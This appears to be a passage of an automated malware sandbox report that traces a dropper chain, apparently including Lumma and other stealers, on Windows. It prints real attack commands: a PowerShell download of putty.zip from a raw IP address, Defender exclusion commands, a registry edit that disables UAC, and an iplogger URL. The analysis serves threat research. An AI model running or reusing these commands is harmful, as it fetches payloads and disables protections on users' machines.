8b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	axplont.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	axplont.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	axplont.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	KcrOep5d9ZbonDmjbJKv3Q95.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	KcrOep5d9ZbonDmjbJKv3Q95.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	KcrOep5d9ZbonDmjbJKv3Q95.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	axplont.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1540 PING.EXE

pid	process
1540	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exeaxplont.exepowershell.exePresident.pifpowershell.exeXd5ffINUWAexJgt1ZKuSRDbx.exepowershell.exenewbild.exeAddInProcess32.exechrome.exepowershell.exe

pid	process
3068	8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe
2736	axplont.exe
1572	powershell.exe
876	President.pif
876	President.pif
876	President.pif
2792	powershell.exe
496	Xd5ffINUWAexJgt1ZKuSRDbx.exe
496	Xd5ffINUWAexJgt1ZKuSRDbx.exe
2516	powershell.exe
2460	newbild.exe
2460	newbild.exe
2460	newbild.exe
2460	newbild.exe
2176	AddInProcess32.exe
2460	newbild.exe
1316	chrome.exe
1316	chrome.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
3808	powershell.exe
876	President.pif
876	President.pif
876	President.pif
876	President.pif
3808	powershell.exe
3808	powershell.exe
3808	powershell.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe
2176	AddInProcess32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetasklist.exetasklist.exefile300un.exepowershell.exeinstallutil.exeXd5ffINUWAexJgt1ZKuSRDbx.exevXaAyaPZGSQ7ID7cEXrEbQ7m.exepowershell.exenewbild.exeAddInProcess32.exechrome.exepowershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeDebugPrivilege	1716	tasklist.exe
Token: SeDebugPrivilege	2388	tasklist.exe
Token: SeDebugPrivilege	3024	file300un.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	1012	installutil.exe
Token: SeManageVolumePrivilege	496	Xd5ffINUWAexJgt1ZKuSRDbx.exe
Token: SeDebugPrivilege	1676	vXaAyaPZGSQ7ID7cEXrEbQ7m.exe
Token: SeDebugPrivilege	2516	powershell.exe
Token: SeDebugPrivilege	2460	newbild.exe
Token: SeDebugPrivilege	2176	AddInProcess32.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeDebugPrivilege	3808	powershell.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeDebugPrivilege	3800	powershell.exe
Token: SeIncreaseQuotaPrivilege	1020	WMIC.exe
Token: SeSecurityPrivilege	1020	WMIC.exe
Token: SeTakeOwnershipPrivilege	1020	WMIC.exe
Token: SeLoadDriverPrivilege	1020	WMIC.exe
Token: SeSystemProfilePrivilege	1020	WMIC.exe
Token: SeSystemtimePrivilege	1020	WMIC.exe
Token: SeProfSingleProcessPrivilege	1020	WMIC.exe
Token: SeIncBasePriorityPrivilege	1020	WMIC.exe
Token: SeCreatePagefilePrivilege	1020	WMIC.exe
Token: SeBackupPrivilege	1020	WMIC.exe
Token: SeRestorePrivilege	1020	WMIC.exe
Token: SeShutdownPrivilege	1020	WMIC.exe
Token: SeDebugPrivilege	1020	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1020	WMIC.exe
Token: SeRemoteShutdownPrivilege	1020	WMIC.exe
Token: SeUndockPrivilege	1020	WMIC.exe
Token: SeManageVolumePrivilege	1020	WMIC.exe
Token: 33	1020	WMIC.exe
Token: 34	1020	WMIC.exe
Token: 35	1020	WMIC.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe
Token: SeShutdownPrivilege	1316	chrome.exe

Suspicious use of FindShellTrayWindow 39 IoCs

Processes:

8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exeiexplore.exePresident.pifchrome.exe

pid	process
3068	8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe
564	iexplore.exe
876	President.pif
876	President.pif
876	President.pif
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe

Suspicious use of SendNotifyMessage 35 IoCs

Processes:

President.pifchrome.exe

pid	process
876	President.pif
876	President.pif
876	President.pif
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe
1316	chrome.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

iexplore.exeIEXPLORE.EXEAddInProcess32.exe

pid process

564 iexplore.exe
564 iexplore.exe
2916 IEXPLORE.EXE
2916 IEXPLORE.EXE
2176 AddInProcess32.exe

pid	process
564	iexplore.exe
564	iexplore.exe
2916	IEXPLORE.EXE
2916	IEXPLORE.EXE
2176	AddInProcess32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exeaxplont.exe33333.exelumma1234.exegold.exeswizzzz.exebuildjudit.exesmartsoftsignew.execmd.exe

description	pid	process	target process
PID 3068 wrote to memory of 2736	3068	8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe	axplont.exe
PID 3068 wrote to memory of 2736	3068	8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe	axplont.exe
PID 3068 wrote to memory of 2736	3068	8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe	axplont.exe
PID 3068 wrote to memory of 2736	3068	8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe	axplont.exe
PID 2736 wrote to memory of 2440	2736	axplont.exe	33333.exe
PID 2736 wrote to memory of 2440	2736	axplont.exe	33333.exe
PID 2736 wrote to memory of 2440	2736	axplont.exe	33333.exe
PID 2736 wrote to memory of 2440	2736	axplont.exe	33333.exe
PID 2440 wrote to memory of 2968	2440	33333.exe	WerFault.exe
PID 2440 wrote to memory of 2968	2440	33333.exe	WerFault.exe
PID 2440 wrote to memory of 2968	2440	33333.exe	WerFault.exe
PID 2440 wrote to memory of 2968	2440	33333.exe	WerFault.exe
PID 2736 wrote to memory of 2416	2736	axplont.exe	lumma1234.exe
PID 2736 wrote to memory of 2416	2736	axplont.exe	lumma1234.exe
PID 2736 wrote to memory of 2416	2736	axplont.exe	lumma1234.exe
PID 2736 wrote to memory of 2416	2736	axplont.exe	lumma1234.exe
PID 2416 wrote to memory of 1548	2416	lumma1234.exe	WerFault.exe
PID 2416 wrote to memory of 1548	2416	lumma1234.exe	WerFault.exe
PID 2416 wrote to memory of 1548	2416	lumma1234.exe	WerFault.exe
PID 2416 wrote to memory of 1548	2416	lumma1234.exe	WerFault.exe
PID 2736 wrote to memory of 344	2736	axplont.exe	gold.exe
PID 2736 wrote to memory of 344	2736	axplont.exe	gold.exe
PID 2736 wrote to memory of 344	2736	axplont.exe	gold.exe
PID 2736 wrote to memory of 344	2736	axplont.exe	gold.exe
PID 344 wrote to memory of 1412	344	gold.exe	WerFault.exe
PID 344 wrote to memory of 1412	344	gold.exe	WerFault.exe
PID 344 wrote to memory of 1412	344	gold.exe	WerFault.exe
PID 344 wrote to memory of 1412	344	gold.exe	WerFault.exe
PID 2736 wrote to memory of 2016	2736	axplont.exe	swizzzz.exe
PID 2736 wrote to memory of 2016	2736	axplont.exe	swizzzz.exe
PID 2736 wrote to memory of 2016	2736	axplont.exe	swizzzz.exe
PID 2736 wrote to memory of 2016	2736	axplont.exe	swizzzz.exe
PID 2016 wrote to memory of 2780	2016	swizzzz.exe	WerFault.exe
PID 2016 wrote to memory of 2780	2016	swizzzz.exe	WerFault.exe
PID 2016 wrote to memory of 2780	2016	swizzzz.exe	WerFault.exe
PID 2016 wrote to memory of 2780	2016	swizzzz.exe	WerFault.exe
PID 2736 wrote to memory of 996	2736	axplont.exe	buildjudit.exe
PID 2736 wrote to memory of 996	2736	axplont.exe	buildjudit.exe
PID 2736 wrote to memory of 996	2736	axplont.exe	buildjudit.exe
PID 2736 wrote to memory of 996	2736	axplont.exe	buildjudit.exe
PID 996 wrote to memory of 2000	996	buildjudit.exe	stub.exe
PID 996 wrote to memory of 2000	996	buildjudit.exe	stub.exe
PID 996 wrote to memory of 2000	996	buildjudit.exe	stub.exe
PID 2736 wrote to memory of 2400	2736	axplont.exe	smartsoftsignew.exe
PID 2736 wrote to memory of 2400	2736	axplont.exe	smartsoftsignew.exe
PID 2736 wrote to memory of 2400	2736	axplont.exe	smartsoftsignew.exe
PID 2736 wrote to memory of 2400	2736	axplont.exe	smartsoftsignew.exe
PID 2736 wrote to memory of 2400	2736	axplont.exe	smartsoftsignew.exe
PID 2736 wrote to memory of 2400	2736	axplont.exe	smartsoftsignew.exe
PID 2736 wrote to memory of 2400	2736	axplont.exe	smartsoftsignew.exe
PID 2400 wrote to memory of 1688	2400	smartsoftsignew.exe	cmd.exe
PID 2400 wrote to memory of 1688	2400	smartsoftsignew.exe	cmd.exe
PID 2400 wrote to memory of 1688	2400	smartsoftsignew.exe	cmd.exe
PID 2400 wrote to memory of 1688	2400	smartsoftsignew.exe	cmd.exe
PID 2400 wrote to memory of 1688	2400	smartsoftsignew.exe	cmd.exe
PID 2400 wrote to memory of 1688	2400	smartsoftsignew.exe	cmd.exe
PID 2400 wrote to memory of 1688	2400	smartsoftsignew.exe	cmd.exe
PID 1688 wrote to memory of 1572	1688	cmd.exe	powershell.exe
PID 1688 wrote to memory of 1572	1688	cmd.exe	powershell.exe
PID 1688 wrote to memory of 1572	1688	cmd.exe	powershell.exe
PID 1688 wrote to memory of 1572	1688	cmd.exe	powershell.exe
PID 1688 wrote to memory of 1572	1688	cmd.exe	powershell.exe
PID 1688 wrote to memory of 1572	1688	cmd.exe	powershell.exe
PID 1688 wrote to memory of 1572	1688	cmd.exe	powershell.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

file300un.exevXaAyaPZGSQ7ID7cEXrEbQ7m.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	vXaAyaPZGSQ7ID7cEXrEbQ7m.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1196

C:\Users\Admin\AppData\Local\Temp\8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe
"C:\Users\Admin\AppData\Local\Temp\8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3068

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2736

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 72
5⤵
- Loads dropped DLL
- Program crash
PID:2968

C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2416 -s 68
5⤵
- Loads dropped DLL
- Program crash
PID:1548

C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 72
5⤵
- Loads dropped DLL
- Program crash
PID:1412

C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 52
5⤵
- Loads dropped DLL
- Program crash
PID:2780

C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe
"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:996

C:\Users\Admin\AppData\Local\Temp\onefile_996_133617873297458000\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2000

C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe
"C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
5⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/26uSj6
6⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:564

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:564 CREDAT:275457 /prefetch:2
7⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2916

C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe"
4⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:3024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe" -Force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
5⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Users\Admin\Pictures\vXaAyaPZGSQ7ID7cEXrEbQ7m.exe
"C:\Users\Admin\Pictures\vXaAyaPZGSQ7ID7cEXrEbQ7m.exe"
6⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\vXaAyaPZGSQ7ID7cEXrEbQ7m.exe" -Force
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516

